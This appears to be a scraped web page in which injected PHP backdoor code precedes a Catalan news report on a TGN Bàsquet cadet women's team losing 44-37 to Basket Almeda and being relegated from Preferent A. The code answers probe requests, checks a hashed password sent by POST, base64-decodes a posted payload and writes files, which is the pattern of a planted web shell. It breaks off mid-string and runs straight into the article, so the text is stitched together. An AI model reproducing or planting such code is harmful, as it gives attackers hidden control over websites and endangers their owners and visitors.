function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Cadet femení 05 A perd contra el Basket Almeda i no pot mantenir la categoria de Preferent A (44-37) - Tgn Bàsquet Club -

El Cadet femení 05 A perd contra el Basket Almeda i no pot mantenir la categoria de Preferent A (44-37)

Updated: abril 4, 2021

L’equip Cadet femení 05 A del TGN Bàsquet no ha pogut mantenir la plaça de Preferent A —la màxima de Catalunya— que havia ostentat des de l’inici de temporada. En les fases per a mantenir aquesta categoria, el conjunt lila ha perdut dos dels tres partits que ha jugat i això l’ha condemnat a Preferent B.

Tot i perdre en la primera jornada contra el Joventut de Badalona Femení (46-52), les jugadores que entrena Albert del Rey han guanyat el Grup Barna el matí d’avui diumenge (39-44) i això les ha donat esperança d’aconseguir la permanència. Per a fer-ho realitat, el TGN Bàsquet havia de guanyar el principal favorit del grup, el Basket Almeda, que fins aleshores havia vençut en tots els partits que havia disputat. El matx contra les tarragonines no ha estat l’excepció.

El TGN Bàsquet ha estat víctima del mateix mal de tot el cap de setmana: la mala punteria. Les liles han estat horribles en el tir en els tres partits (especialment contra el Joventut) i això les ha impedit assolir l’objectiu. Contra l’Almeda, el conjunt tarragoní ha demostrat que, amb esforç i defensa, es pot plantar cara i tenir opcions de victòria contra tothom, però això ha d’anar acompanyat d’uns percentatges mitjanament bons. No ha estat el cas.

El Basket Almeda n’ha tingut prou en aprofitar les nombroses errades de les tarragonines per dominar des de l’inici (14-11 al final del primer quart). La defensa de les liles ha posat en moltes dificultats l’atac rival que ha aprofitat, però, la superioritat física sota el cèrcol en el segon quart, per continuar el seu domini (19-13, 7:47 pel descans). Les tarragonines han reaccionat, s’han situat a només un punt (19-18, a 4 minuts del descans) però han tornat a tenir una apagada ofensiva o, millor dit, el punt de mira desviat. A la mitja part, 25-18.

En tot el tercer quart, el TGN Bàsquet només ha anotat 3 punts i, tot i això, el marcador mostrava un tempteig de 32-21. Quan faltaven 5 minuts pel final del matx, el resultat era de 39-25, és a dir, en 15 minuts, les liles havien fet 7 punts. Un bagatge massa escàs. Però el partit no estava del tot decidit i, en un tram final encomiable, les jugadores d’Albert del Rey han estat capaces de retallar diferències tot i que la victòria ja quedava massa lluny.